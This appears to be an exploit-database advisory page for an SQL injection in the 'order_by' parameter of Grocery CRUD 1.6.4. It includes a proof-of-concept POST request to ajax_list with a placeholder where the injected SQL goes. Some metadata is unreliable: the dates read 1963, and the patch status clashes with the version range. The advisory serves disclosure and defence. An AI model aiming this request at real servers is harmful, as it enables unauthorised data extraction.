Grocery crud 1.6.4 - 'order_by' SQL Injection

vendor:

Grocery Crud

by:

TonyShavez

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Grocery Crud

Affected Version From: < v2.0.1

Affected Version To: < v2.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:grocerycrud:grocery_crud:1.6.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux Ubuntu

1963

Grocery crud 1.6.4 – ‘order_by’ SQL Injection

Grocery crud version 1.6.4 is vulnerable to SQL Injection in the 'order_by' parameter. An attacker can inject malicious SQL code in the 'order_by' parameter of the POST request to the ajax_list page. This can be used to extract data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection
# Date: 11/06/1963
# Exploit Author: TonyShavez
# Vendor Homepage: https://www.grocerycrud.com/
# Software Link: https://www.grocerycrud.com/downloads
# Version: < v2.0.1
# Tested on: [Linux Ubuntu]

Proof Of concept : 
=======================
#Request:

POST /path/to/ajax_list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
DNT: 1
Connection: close

page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text=
=======================
#vulnerable parameter :

order_by 
=======================
#type : [error-based]